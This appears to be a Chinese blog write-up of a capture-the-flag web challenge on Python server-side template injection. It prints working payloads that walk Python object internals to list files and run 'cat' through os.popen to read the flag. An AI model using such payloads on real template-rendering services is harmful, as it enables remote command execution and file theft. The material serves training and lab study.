美文网首页20-22年 攻防笔记
攻防世界(进阶)--WEB--7.Web_python_temp

攻防世界(进阶)--WEB--7.Web_python_temp

作者: Du1in9 | 来源:发表于2020-02-14 18:45 被阅读0次

考察点:模板注入

1.模板检测:{{7+7}}

7+7=14,确实是模板注入

2.查看服务器配置信息:{{''.__class__.__mro__[2].__subclasses__()}}

3.读取passwd信息:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

发现2个文件:'fl4g', 'index.py'

4.打开'fl4g':{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('cat fl4g').read()}}

得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

相关文章

网友评论

    本文标题:攻防世界(进阶)--WEB--7.Web_python_temp

    本文链接:https://www.haomeiwen.com/subject/ouyjfhtx.html